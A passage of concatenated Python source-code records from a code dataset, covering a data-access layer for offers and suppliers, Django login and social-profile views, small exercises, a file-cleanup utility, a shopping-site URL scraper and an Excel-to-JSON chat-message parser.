'utf-8'))\n\n    def _persist_offers_payments_(self, offers):\n        payments_dict = filter(lambda x: int(x['offer_id']) not in map(lambda x: x.id, offers),\n                               
json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n for offer in offers:\n for sub_offer in offer.sub_offers:\n payments_dict.extend(map(lambda x: x.as_dictionary, sub_offer.payments))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def _retrieve_offer_payments_(self, offer_id):\n payments = []\n payments_dict = json.load(codecs.open(self.payments_file, 'r', 'utf-8'))\n for payment_dict in payments_dict:\n if int(payment_dict['offer_id']) == offer_id:\n if payment_dict['sub_offer_id'] != '':\n sub_offer_id = payment_dict['sub_offer_id']\n else:\n sub_offer_id = '0'\n payment_method = PaymentMethod(payment_dict['payment_method'].split(' - ')[0],\n payment_dict['payment_method'].split(' - ')[1])\n payment_type = self._create_payment_type_from_string_(payment_dict['payment_type'])\n payments.append(Payment(None, int(sub_offer_id), int(payment_dict['id']),\n float(payment_dict['original_amount']), float(payment_dict['amount']),\n self._str_to_date_(payment_dict['date']), payment_method,\n payment_type, payment_dict['description'], payment_dict['status']))\n return payments\n\n def _delete_offer_payments_(self, delete_offer):\n payments_dict = filter(lambda x: int(x['offer_id']) != delete_offer.id,\n json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def _delete_offers_payments_(self, delete_offers):\n payments_dict = filter(lambda x: int(x['offer_id']) not in map(lambda x: x.id, delete_offers),\n json.load(codecs.open(self.payments_file, 'r', 'utf-8')))\n json.dump(payments_dict, codecs.open(self.payments_file, 'w', 'utf-8'))\n\n def persist_offer(self, persist_offer):\n offers = filter(lambda x: x != persist_offer, self.retrieve_all_offers())\n offers.append(persist_offer)\n json.dump(map(lambda x: x.as_dictionary, offers), codecs.open(self.offers_file, 'w', 'utf-8'))\n self._persist_offer_payments_(persist_offer)\n\n def persist_offers(self, persist_offers):\n offers = filter(lambda x: x not in persist_offers, self.retrieve_all_offers())\n offers.extend(persist_offers)\n json.dump(map(lambda x: x.as_dictionary, offers), codecs.open(self.offers_file, 'w', 'utf-8'))\n self._persist_offers_payments_(persist_offers)\n\n def retrieve_all_offers(self, payments_data=True, payments_data_for=None):\n offers = []\n for offer_dict in json.load(codecs.open(self.offers_file, 'r', 'utf-8')):\n id = int(offer_dict['id'])\n if offer_dict['supplier'] != '':\n supplier = self.retrieve_supplier_by_id(int(offer_dict['supplier']['id']))\n else:\n supplier = None\n payment_type = self._create_payment_type_from_string_(offer_dict['payment_type'])\n payment_method = PaymentMethod(offer_dict['payment_method'].split(' - ')[0],\n offer_dict['payment_method'].split(' - ')[1])\n\n offer = Offer(id, [], offer_dict['product'], supplier, self._str_to_date_(offer_dict['date']),\n self._str_to_date_(offer_dict['online_end_date']),\n self._str_to_date_(offer_dict['expiration_date']),\n payment_type, payment_method, offer_dict['scout'],\n offer_dict['include_in_commercial_report'],\n offer_dict['include_in_payments_report'])\n\n for sub_offer_dict in offer_dict['sub_offers']:\n offer.sub_offers.append(SubOffer(offer, int(sub_offer_dict['id']), float(sub_offer_dict['price']),\n int(sub_offer_dict['sold']),\n int(sub_offer_dict['exchanged']),\n int(sub_offer_dict['cancelled']),\n float(sub_offer_dict['commission']), []))\n\n offers.append(offer)\n\n if payments_data:\n for offer in filter(lambda x: 
payments_data_for is None or x.id in payments_data_for, offers):\n offer.add_payments(self._retrieve_offer_payments_(offer.id))\n\n return offers\n\n def retrieve_offers(self, filter_offer):\n return filter(lambda x: x.filter_from_template(filter_offer), self.retrieve_all_offers())\n\n def retrieve_offer_by_id(self, offer_id):\n offers = self.retrieve_all_offers(payments_data=False)\n if len(filter(lambda x: x.id == offer_id, offers)) > 0:\n return filter(lambda x: x.id == offer_id, self.retrieve_all_offers(payments_data_for=[offer_id]))[0]\n else:\n return None\n\n def _delete_offer_(self, delete_offer):\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: x != delete_offer, self.retrieve_all_offers())),\n codecs.open(self.offers_file, 'w', 'utf-8'))\n self._delete_offer_payments_(delete_offer)\n\n def delete_offers(self, filter_offer):\n offers = self.retrieve_all_offers()\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: not x.filter_from_template(filter_offer), offers)),\n codecs.open(self.offers_file, 'w', 'utf-8'))\n self._delete_offers_payments_(filter(lambda x: x.filter_from_template(filter_offer), offers))\n\n def delete_offer_by_id(self, offer_id):\n for offer in filter(lambda x: x.id == offer_id, self.retrieve_all_offers()):\n self._delete_offer_(offer)\n return\n\n def persist_supplier(self, persist_supplier):\n suppliers = filter(lambda x: x != persist_supplier, self.retrieve_all_suppliers)\n suppliers.append(persist_supplier)\n json.dump(map(lambda x: x.as_dictionary, suppliers), codecs.open(self.suppliers_file, 'w', 'utf-8'))\n\n @property\n def retrieve_all_suppliers(self):\n suppliers = []\n for supplier_dict in json.load(codecs.open(self.suppliers_file, 'r', 'utf-8')):\n id = int(supplier_dict['id'])\n payment_methods = []\n for payment_method_dict in supplier_dict['payment_methods']:\n payment_methods.append(PaymentMethod(payment_method_dict.split(' - ')[0],\n payment_method_dict.split(' - ')[1]))\n\n if supplier_dict['default_payment_type'] != '':\n default_payment_type = self._create_payment_type_from_string_(supplier_dict['default_payment_type'])\n else:\n default_payment_type = None\n\n supplier = Supplier(id, supplier_dict['name'], payment_methods, default_payment_type)\n\n suppliers.append(supplier)\n\n return suppliers\n\n def retrieve_suppliers(self, filter_supplier):\n return filter(lambda x: x.filter_from_template(filter_supplier), self.retrieve_all_suppliers)\n\n def retrieve_supplier_by_id(self, id):\n suppliers = self.retrieve_all_suppliers\n if len(filter(lambda x: x.id == id, suppliers)) > 0:\n return filter(lambda x: x.id == id, suppliers)[0]\n else:\n return None\n\n def _delete_supplier_(self, delete_supplier):\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: x != delete_supplier, self.retrieve_all_suppliers)),\n codecs.open(self.suppliers_file, 'w', 'utf-8'))\n\n def delete_suppliers(self, filter_supplier):\n json.dump(map(lambda y: y.as_dictionary, filter(lambda x: not x.filter_from_template(filter_supplier),\n self.retrieve_all_suppliers)),\n codecs.open(self.suppliers_file, 'w', 'utf-8'))\n\n def delete_supplier_by_id(self, supplier_id):\n for supplier in filter(lambda x: x.id == supplier_id, self.retrieve_all_suppliers):\n self._delete_supplier_(supplier)\n return\n\n\nclass DaoPostgre(DaoAbstract):\n type = 'Postgre'\n\n def __init__(self, db_session, engine=None):\n super(DaoPostgre, self).__init__()\n self.session = db_session\n self.engine = engine\n\n def _create_payment_from_dictionary_(self, sub_offer, 
payment_dict):\n        Payment(sub_offer, id=payment_dict['id'], original_amount=payment_dict['original_amount'],\n                amount=payment_dict['amount'], date=datetime.datetime.strptime(payment_dict['date'], '%Y-%m-%d').date(),\n                description=payment_dict['description'], status=payment_dict['status'])\n\n    def _create_sub_offer_from_dictionary_(self, offer, sub_offer_dict):\n        sub_offer = SubOffer(offer, id=sub_offer_dict['id'], price=sub_offer_dict['price'], sold=sub_offer_dict['sold'],\n                             exchanged=sub_offer_dict['exchanged'], cancelled=sub_offer_dict['cancelled'],\n                             commission=sub_offer_dict['commission'])\n\n        for payment_dict in sub_offer_dict['payments']:\n            self._create_payment_from_dictionary_(sub_offer, payment_dict)\n\n    def create_offer_from_dictionary(self, offer_dict):\n        supplier = self.retrieve_supplier_by_id(offer_dict['supplier']['id'])\n\n        offer = Offer(id=offer_dict['id'], product=offer_dict['product'], supplier=supplier,\n                      date=datetime.datetime.strptime(offer_dict['date'], '%Y-%m-%d').date(),\n                      online_end_date=datetime.datetime.strptime(offer_dict['online_end_date'], '%Y-%m-%d').date(),\n                      expiration_date=datetime.datetime.strptime(offer_dict['expiration_date'], '%Y-%m-%d').date(),\n                      payment_type_name=offer_dict['payment_type'],\n                      payment_method=filter(lambda pm: pm.method ==\n                                            offer_dict['payment_method'].split('-', 1)[0].strip() and\n                                            pm.data == offer_dict['payment_method'].split('-', 1)[1]\n                                            .strip(), supplier.payment_methods)[0],\n                      scout=offer_dict['scout'],\n                      include_in_commercial_report=offer_dict['include_in_commercial_report'],\n                      include_in_payments_report=offer_dict['include_in_payments_report'],\n                      service_fee=float(offer_dict['service_fee'] if offer_dict['service_fee'] is not None else 0.0))\n\n        self.session.add(offer)\n\n        for sub_offer_dict in offer_dict['sub_offers']:\n            self._create_sub_offer_from_dictionary_(offer, sub_offer_dict)\n\n        return offer\n\n    def create_supplier_from_dictionary(self, supplier_dict):\n        supplier = self.session.query(Supplier).filter(Supplier.id == supplier_dict['id']).one_or_none()\n        if supplier is None:\n            supplier = Supplier(supplier_dict['id'], supplier_dict['name'],\n                                default_payment_type_name=supplier_dict['default_payment_type'])\n            self.session.add(supplier)\n        else:\n            supplier.name = supplier_dict['name']\n            supplier.default_payment_type_name = supplier_dict['default_payment_type']\n\n        payment_method_id = 1\n        for payment_method in supplier_dict['payment_methods']:\n            try:\n                pm = sorted(supplier.payment_methods, key=lambda pm: pm.id)[payment_method_id - 1]\n                pm.method = payment_method.split(' - ', 1)[0]\n                pm.data = payment_method.split(' - ', 1)[1]\n            except IndexError:\n                PaymentMethod(supplier, method=payment_method.split(' - ', 1)[0],\n                              data=payment_method.split(' - ', 1)[1])\n            finally:\n                payment_method_id += 1\n\n        warnings_offers_deleted = []\n        payment_methods_to_delete = supplier.payment_methods[payment_method_id - 1:]\n        for pm in payment_methods_to_delete:\n            if len(pm.offers) > 0:\n                warnings_offers_deleted.extend(map(lambda o: o.id, pm.offers))\n            self.session.delete(pm)\n        warnings_offers_deleted = sorted(list(set(warnings_offers_deleted)))\n\n        return str(warnings_offers_deleted) if len(warnings_offers_deleted) > 0 else ''\n\n    def persist_changes(self):\n        self.session.commit()\n\n    def retrieve_all_offers(self, payments_data=True, payments_data_for=None):\n        if payments_data:\n            return list(set(map(lambda r: r.Offer, self.session.query(Offer, SubOffer).join(SubOffer).join(Supplier)\n                                .options(joinedload(SubOffer.payments), joinedload(Offer.payment_method)).all())))\n        else:\n            return 
self.session.query(Offer).join(SubOffer).join(Supplier).options(joinedload(Offer.payment_method))\\\n                .all()\n\n    def retrieve_offer_by_id(self, offer_id):\n        return self.session.query(Offer).filter(Offer.id == int(offer_id)).one_or_none()\n\n    def delete_offer(self, offer):\n        if offer is not None:\n            self.session.delete(offer)\n\n    def delete_offer_by_id(self, offer_id):\n        self.delete_offer(self.retrieve_offer_by_id(int(offer_id)))\n\n    @property\n    def retrieve_all_suppliers(self):\n        return self.session.query(Supplier).join(PaymentMethod).all()\n\n    @property\n    def retrieve_first_supplier(self):\n        return self.session.query(Supplier).join(PaymentMethod).order_by(Supplier.id).first()\n\n    def retrieve_supplier_by_id(self, supplier_id):\n        return self.session.query(Supplier).join(PaymentMethod).filter(Supplier.id == int(supplier_id)).one_or_none()\n\n    def delete_supplier(self, supplier):\n        if supplier is not None:\n            self.session.delete(supplier)\n\n    def delete_supplier_by_id(self, supplier_id):\n        supplier = self.retrieve_supplier_by_id(int(supplier_id))\n        warnings_offers_deleted = sorted(list(set(map(lambda o: o.id, supplier.offers))))\n        self.delete_supplier(supplier)\n        return str(warnings_offers_deleted) if len(warnings_offers_deleted) > 0 else ''\n\n    def full_back_up(self):\n        connection = self.engine.raw_connection()\n        try:\n            cursor = connection.cursor()\n            cursor.callproc('gru.create_backup', [])\n            cursor.close()\n            connection.commit()\n        finally:\n            connection.close()\n\n    @property\n    def available_back_ups(self):\n        connection = self.engine.raw_connection()\n        results = []\n        try:\n            cursor = connection.cursor()\n            cursor.execute(\"select distinct substring(table_schema, 5, 1000) from information_schema.tables where \"\n                           \"table_schema like 'gru_%'\")\n            results = cursor.fetchall()\n            cursor.close()\n        finally:\n            connection.close()\n        return map(lambda r: {'timestamp': str(datetime.datetime.strptime(r[0], '%Y%m%d%H%M%S')), 'timestamp_string': r[0]},\n                   results)\n\n    def recover_back_up(self, timestamp_string, back_up_current_data=True):\n        connection = self.engine.raw_connection()\n        try:\n            if back_up_current_data:\n                self.full_back_up()\n            cursor = connection.cursor()\n            cursor.callproc('gru.restore_backup', [timestamp_string])\n            cursor.close()\n            connection.commit()\n        finally:\n            connection.close()\n\n    def drop_back_up(self, timestamp_string):\n        connection = self.engine.raw_connection()\n        try:\n            cursor = connection.cursor()\n            cursor.callproc('gru.drop_backup', [timestamp_string])\n            cursor.close()\n            connection.commit()\n        finally:\n            connection.close()\n","sub_path":"src/classes/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":45315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126330361","text":"# Create your views here.\n\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.cache import never_cache\n\nfrom django.contrib.auth import REDIRECT_FIELD_NAME, login as auth_login\nfrom django.shortcuts import resolve_url\nfrom django.utils.http import is_safe_url\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.template.response import TemplateResponse\nfrom django.contrib.sites.models import get_current_site\nfrom saas.forms import SaasAuthenticationForm\n\n\n@sensitive_post_parameters()\n@csrf_protect\n@never_cache\ndef login(request, template_name='client_login.html',\n          redirect_field_name=REDIRECT_FIELD_NAME,\n          
authentication_form=SaasAuthenticationForm,\n current_app=None, extra_context=None):\n \"\"\"\n Displays the login form and handles the login action.\n \"\"\"\n redirect_to = request.REQUEST.get(redirect_field_name, '')\n\n if request.method == \"POST\":\n form = authentication_form(request, data=request.POST)\n if form.is_valid():\n\n # Ensure the user-originating redirection url is safe.\n if not is_safe_url(url=redirect_to, host=request.get_host()):\n redirect_to = resolve_url(settings.LOGIN_REDIRECT_URL)\n\n # Okay, security check complete. Log the user in.\n auth_login(request, form.get_user())\n\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n\n return HttpResponseRedirect(redirect_to)\n else:\n form = authentication_form(request)\n\n request.session.set_test_cookie()\n\n current_site = get_current_site(request)\n\n context = {\n 'form': form,\n redirect_field_name: redirect_to,\n 'site': current_site,\n 'site_name': current_site.name,\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(request, template_name, context,\n current_app=current_app)\n","sub_path":"code/saas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"434212320","text":"import copy\n\nclass Time():\n\n def __init__(self, h, m, s): #constructor __init__ \n self.hour = h\n self.minute = m\n self.second = s\n\n def print_nicely(self):\n print(\"%02d:%02d:%02d\" %(self.hour, self.minute, self.second) , end = \"\")\n\nclass Event():\n def __init__(self, name, t1, t2):\n self.name = name\n self.start = t1\n self.end = t2\n \n def set_name(self, n):\n self.name = n\n\n def print_nicely(self):\n print(\"%s : from \" %self.name, end = \"\")\n self.start.print_nicely()\n print(\" to \", end = \"\")\n self.end.print_nicely()\n\nclass Schedule():\n def __init__(self):\n self.now_event = []\n\n def add_event(self, e):\n self.now_event.append(e)\n\n def print_events(self):\n for item in self.now_event:\n item.print_nicely()\n print()\n\n\nname = 'PBC'\nt1 = Time(9, 10, 0)\nt2 = Time(12, 10, 0)\ne1 = Event(name, t1, t2)\n\nt1 = Time(14, 10, 0)\nt2 = Time(17, 10, 0)\ne2 = Event(\"tsetclass\", t1, t2)\n\nsch = Schedule()\nsch.add_event(e1)\nsch.add_event(e2)\nsch.print_events()\n\n''' copy.deepcopy(multiple type object)\ne2 = copy.deepcopy(e1)\nprint()\ne2.print_nicely()\n'''\n\n\n\n","sub_path":"2019_spring/hw/hw08/class_in_class/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"13418514","text":"from django.views.generic import TemplateView\nfrom profiles import models, forms, helpers\nfrom django.shortcuts import redirect\nfrom django.http import JsonResponse, HttpResponse\nfrom twitter_project.logging import logger\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError\nfrom django.contrib.messages import error\nfrom django.shortcuts import render\n\n\nclass ProfileView(TemplateView):\n template_name = \"tweets/homepage.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['main_body'] = \"profile\"\n\n context['profile_id'] = self.kwargs.get(\"profile_id\")\n return context\n\n\nclass SuggestionsView(TemplateView):\n template_name = \"tweets/homepage.html\"\n\n def 
get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['main_body'] = \"suggestions\"\n return context\n\n\nclass SignupView(TemplateView):\n template_name = \"profiles/sign_up.html\"\n login_required = False\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = forms.SignUpForm\n return context\n\n\nclass LoginView(TemplateView):\n template_name = \"profiles/login.html\"\n login_required = False\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['login_form'] = forms.LoginForm\n return context\n\n def dispatch(self, *args, **kwargs):\n if self.request.user.is_authenticated:\n return redirect('/home')\n return super().dispatch(*args, **kwargs)\n\n def post(self, request):\n identifier = request.POST.get(\"identifier\")\n password = request.POST.get('password')\n try:\n user = authenticate(identifier=identifier, password=password)\n except ObjectDoesNotExist as e:\n error(request, str(e))\n return redirect(\"/login\")\n\n login(request, user, backend=\"twitter_project.backends.CustomLoginBackend\")\n # go back to the homepage\n return redirect(\"/home\")\n\n\nclass LandingPageView(TemplateView):\n template_name = \"profiles/landing_page.html\"\n login_required = False\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['login_form'] = forms.LoginForm\n return context\n\n def dispatch(self, *args, **kwargs):\n if self.request.user.is_authenticated:\n return redirect('/home')\n return super().dispatch(*args, **kwargs)\n\n def post(self, request):\n identifier = request.POST.get(\"identifier\")\n password = request.POST.get('password')\n try:\n user = authenticate(identifier=identifier, password=password)\n except ObjectDoesNotExist as e:\n error(request, str(e))\n return redirect(\"/login\")\n\n login(request, user, backend=\"twitter_project.backends.CustomLoginBackend\")\n # go back to the homepage\n return redirect(\"/home\")\n\n\ndef logout_view(request):\n logout(request)\n return redirect(\"/\")\n\n\ndef check_email_AJAX(request):\n email = request.GET.get(\"email\")\n if not helpers.is_email_valid(email):\n error = \"Please enter a valid email.\"\n elif not helpers.is_email_unique(email):\n error = \"Email has already been taken.\"\n else:\n error = \"\"\n response = {\"error\": error}\n\n logger.debug(\"Email checked: \" + email + \" error found: \" + error)\n\n return JsonResponse(response)\n\n\ndef get_profile_AJAX(request):\n if request.method == \"GET\":\n profile_id = request.GET.get(\"profile_id\")\n try:\n profile = models.Profile.objects.get(username__iexact=profile_id)\n except (ObjectDoesNotExist, ValidationError):\n return HttpResponse(None, status=403)\n\n follower = request.user.profile\n following = profile\n is_followed = helpers.check_if_user_follows(follower=follower,\n following=following)\n\n context = {\"profile\": profile, \"is_followed\": is_followed}\n rendered_template = render(request=request,\n template_name=\"profiles/profile.html\",\n context=context)\n return HttpResponse(rendered_template)\n\n\ndef follow_AJAX(request):\n if request.method == \"POST\":\n if not request.user.is_authenticated:\n return JsonResponse({\"user\": \"User not logged in.\"}, status=401)\n follower = request.user.profile\n following_id = request.POST.get(\"profile_id\")\n try:\n following = models.Profile.objects.get(username__iexact=following_id)\n except 
(ObjectDoesNotExist, ValidationError):\n            return JsonResponse({\"following_id\": \"This profile doesn't exist.\"}, status=403)\n\n        if follower == following:\n            return JsonResponse({\"following_id\": \"You can't follow yourself.\"}, status=405)\n\n        # check if the user has already followed this profile\n        follow = models.Follow.objects.filter(follower=follower, following=following)\n        if follow.exists():\n            follow.delete()\n            followed = False\n        else:\n            new_follow = models.Follow(follower=follower, following=following)\n            new_follow.save()\n            followed = True\n        return JsonResponse({\"followed\": followed})\n    else:\n        return JsonResponse({}, status=405)\n\n\ndef register_AJAX(request):\n    if request.method == \"POST\":\n        name = request.POST.get(\"name\")\n\n        if not name:\n            return JsonResponse({\"name\": \"Missing/Incorrect value\"}, status=400)\n        email = request.POST.get(\"email\")\n        if not email:\n            return JsonResponse({\"email\": \"Missing/Incorrect value\"}, status=400)\n        password = request.POST.get(\"password\")\n        if not password:\n            return JsonResponse({\"password\": \"Missing/Incorrect value\"}, status=400)\n\n        sync_email = request.POST.get(\"sync_email\") == \"true\"\n        person_ads = request.POST.get(\"person_ads\") == \"true\"\n        send_news = request.POST.get(\"send_news\") == \"true\"\n\n        kwargs = {\n            \"name\": name,\n            \"email\": email,\n            \"sync_email\": sync_email,\n            \"person_ads\": person_ads,\n            \"send_news\": send_news\n        }\n        # Password doesn't get logged for security reasons\n        logger.debug(f\"Processing a new profile with kwargs: {kwargs}\")\n\n        profile = helpers.create_new_profile(**kwargs, password=password)\n        login(request, profile.user, backend=\"twitter_project.backends.CustomLoginBackend\")\n\n        return JsonResponse({})\n\n\ndef get_follow_suggestions_AJAX(request):\n    logger.debug(\"Processing raw request: \" + str(request))\n    if request.method == \"GET\":\n        if not request.user.is_authenticated:\n            return HttpResponse(status=401)\n\n        profile = request.user.profile\n        limit = request.GET.get(\"limit\")\n\n        if not limit:\n            limit = 3\n        else:\n            try:\n                limit = int(limit)\n            except ValueError:\n                # 400 == bad request\n                return HttpResponse(status=400)\n            if limit > 30:\n                limit = 30\n\n        profiles = helpers.get_follow_suggestions(profile)[:limit]\n        context = {\"profiles\": profiles}\n        rendered_template = render(request=request,\n                                   template_name=\"profiles/follow_suggestions.html\",\n                                   context=context)\n        return HttpResponse(rendered_template)\n\n    # 405 == method not allowed\n    return HttpResponse(status=405)\n","sub_path":"twitter_project/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"346068134","text":"# Coin Flip Simulation\n\nfrom random import random\nfrom time import sleep\n\ndef coin_flip():\n    if random() >= .5:\n        return True\n    else:\n        return False\n\ndef main():\n    heads = 0\n    tails = 0\n    n = int(input(\"How many times would you like to flip the coin? 
\"))\n\n for i in range(n):\n if coin_flip():\n heads+=1\n print (\"Roll {}, heads!\".format(str(i+1)))\n else:\n tails+=1\n print (\"Roll {}, tails!\".format(str(i+1)))\n sleep(1)\n if heads > tails:\n winner = \"Heads Wins!\"\n elif tails > heads:\n winner = \"Tails Wins!\"\n else:\n winner = \"There was a tie!\"\n \n print (\"_______________________________________\\nTOTAL SCORE:\")\n print (\"Heads: {}\".format(str(heads)))\n print (\"Tails: {}\".format(str(tails)))\n print (winner)\n\nmain()\n\n","sub_path":"coinflip.py","file_name":"coinflip.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348483982","text":"\"\"\"\nQuick util to clean up upload directory\n\"\"\"\n\nfrom pathlib import Path\n\nroot = Path(\"upload\")\n\nfilelist = [p for p in root.glob(\"**/*\") if p.is_file() and p.name != \"mapcycle.txt\"]\ndeletelist = None\n\nif len(filelist) == 0:\n print(\"Nothing to do\")\n exit(0)\n\nfor i, p in enumerate(filelist):\n print(f\"{i}: { (p.relative_to(root)) }\")\n\nkeep: str = input(\"Select files to KEEP (space seperated)\\n\")\n\nif keep:\n keep = [int(s) for s in keep.split(\" \")]\n if len(keep) > 0:\n deletelist = [p for i,p in enumerate(filelist) if i not in keep]\n\nif deletelist is None:\n deletelist = filelist\n\nif len(deletelist) == 0:\n print(\"Nothing to delete\")\n exit(0)\n\nprint(\"Deleting:\\n\", \", \".join((str(p.relative_to(root)) for p in deletelist)))\n\nfor p in deletelist:\n p.unlink()\n","sub_path":"ftpupload/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"161329412","text":"import re, collections, numpy\n\nwith open(\"input.txt\", \"r\") as f:\n puzzle_input = re.findall(r\"\\d+\", f.read())\n\nplayers, last_marble = int(puzzle_input[0]), int(puzzle_input[1])\n\ndef play(players, last_marble):\n marbles = range(1, last_marble+1)\n\n circle = collections.deque([0])\n scores = numpy.zeros(players, dtype=numpy.int64)\n for marble in marbles:\n player = (marble-1) % players\n \n # first marble in circle = current marble!\n if marble % 23 == 0:\n circle.rotate(7)\n scores[player] += marble + circle.popleft()\n else:\n circle.rotate(-2)\n circle.appendleft(marble)\n\n return max(scores)\n\nprint(play(players, last_marble))\n\n# part 2\nprint(play(players, last_marble * 100))","sub_path":"day09/day09.py","file_name":"day09.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"163026718","text":"from selenium import webdriver\nimport random\nimport sys\nimport time\nimport os\nsys.path.append(os.path.abspath(os.path.dirname(os.getcwd())))\nfrom cfg.config import *\nfrom db.Save import save_shop_info, save_shop_url\n\n\nclass UrlSpider(object):\n def __init__(self):\n self.start_url = START_URL\n self.driver = webdriver.Chrome()\n\n def get_shop_url(self):\n self.driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n sleep_time = random.randint(3, 5)\n time.sleep(sleep_time)\n items = self.driver.find_elements_by_xpath('//*[@id=\"J_goodsList\"]/ul/li/div/div/span/a')\n next_page_button = self.driver.find_element_by_xpath('//*[@class=\"pn-next\"]')\n url_list = []\n for item in items:\n url_list.append(item.get_attribute('href'))\n return url_list, next_page_button\n\n def save_url(self, url_list):\n 
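# NOTE (added): URLs are written out one at a time so a crash mid-crawl keeps what\n        # was already gathered; save_shop_url (from db.Save) is assumed to de-duplicate.\n        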
print(\"Number of URLs scraped from the current page: {}\".format(len(url_list)))\n        if len(url_list) > 0:\n            for url in url_list:\n                save_shop_url(url)\n\n    def __del__(self):\n        self.driver.close()\n\n    def run(self):\n        for key in KEYS:\n            self.driver.get(self.start_url)\n            search = self.driver.find_element_by_xpath('//*[@id=\"key\"]')\n            search_button = self.driver.find_element_by_xpath('//*[@class=\"button\"]')\n            search.clear()\n            search.send_keys(key)\n            search_button.click()\n            self.driver.implicitly_wait(5)\n            while True:\n                try:\n                    url_list, next_page_button = self.get_shop_url()\n                    self.save_url(url_list)\n                    if next_page_button is not None:\n                        next_page_button.click()\n                        self.driver.implicitly_wait(5)\n                except Exception as e:\n                    print(e)\n                    break\n\n\nif __name__ == '__main__':\n    spider = UrlSpider()\n    spider.run()","sub_path":"September/JD/crawl/shop_urls_spider.py","file_name":"shop_urls_spider.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"551582317","text":"from django.core.management.base import BaseCommand\r\nfrom django.apps import apps\r\nfrom dataparser.apps import ExcelParser, MessageParser\r\nfrom dataparser.jsonparser import JsonParser\r\nfrom ai.classes.translator_pinyin import translate_by_string\r\nimport os, json, re\r\nfrom datetime import date\r\n\r\nclass Command(BaseCommand):\r\n    help = \"Parse the excel file to json data.\"\r\n\r\n    def add_arguments(self, parser):\r\n        parser.add_argument(\r\n            '-i', dest='input_file', required=True,\r\n            help='the path of the excel 
file.',\r\n )\r\n parser.add_argument(\r\n '-o', dest='output_path', required=False,\r\n help='the name of app.',\r\n )\r\n parser.add_argument(\r\n '-c', dest='check_file_path', required=False,\r\n help='json file path for check.',\r\n )\r\n parser.add_argument(\r\n '-flw', dest='filter_low_weight', required=False,\r\n help='filter low weight.',\r\n )\r\n \r\n\r\n def find_index_of_rlist(self, msg, list):\r\n _finded = False\r\n _r_idx = 0\r\n for _ in list:\r\n if _[2] == msg:\r\n _finded = True\r\n break\r\n _r_idx += 1\r\n return _r_idx if _finded else -1\r\n\r\n def handle(self, *args, **options):\r\n input_file = options.get('input_file')\r\n output_path = options.get('output_path', None)\r\n check_file_path = options.get('check_file_path', None)\r\n filter_low_weight = bool(options.get('filter_low_weight', False))\r\n \r\n result_list = []\r\n\r\n if output_path is None:\r\n _dirname = os.path.dirname(input_file)\r\n _filename = '{}.json'.format(date.today())\r\n output_path = os.path.join(_dirname, '../json/',_filename)\r\n\r\n if isinstance(check_file_path, str) and len(check_file_path) > 2:\r\n _jp = JsonParser(file=check_file_path)\r\n _old_json = _jp.load()\r\n _length_json = len(_old_json)\r\n _j_idx = 0\r\n _half_length = int(_length_json / 2)\r\n print('')\r\n for _oj in _old_json:\r\n _j_idx += 1\r\n if _j_idx % 100 ==0:\r\n print('Handle Old Json.. [ {:.1%} ]'.format(_j_idx / _length_json), end='\\r')\r\n _length_oj = len(_oj)\r\n \r\n status = int(_oj[3])\r\n if status == 5:\r\n continue\r\n\r\n # if _length_oj == 4:\r\n # result_list.append(_oj)\r\n # continue\r\n \r\n msg = _oj[4] if _length_oj>4 else _oj[2]\r\n weight = int(_oj[1]) if _oj[1] else 1\r\n\r\n if filter_low_weight and _j_idx > 10000 and weight <= 1:\r\n continue\r\n\r\n _r_idx = self.find_index_of_rlist(msg, result_list)\r\n \r\n if _r_idx >= 0:\r\n result_list[_r_idx][1] += weight\r\n result_list[_r_idx][3] = status\r\n else:\r\n if weight > 2:\r\n weight -= 1\r\n elif _j_idx < _half_length and weight == 2:\r\n weight = 1\r\n result_list.append([_oj[0], weight, msg, status])\r\n \r\n\r\n try:\r\n print('Start Handle Excel.')\r\n _ep = ExcelParser(file=input_file)\r\n _basic_model_columns = [['VID', '房號'], ['WEIGHT', '權重'], ['MESSAGE', '聊天信息', '禁言内容', '发言内容'], ['STATUS', '審核結果', '状态']]\r\n _excel_data = _ep.get_row_list(column=_basic_model_columns)\r\n _idx = 0\r\n _checking_map = {}\r\n _has_duplicate = False\r\n \r\n\r\n _message_parser = 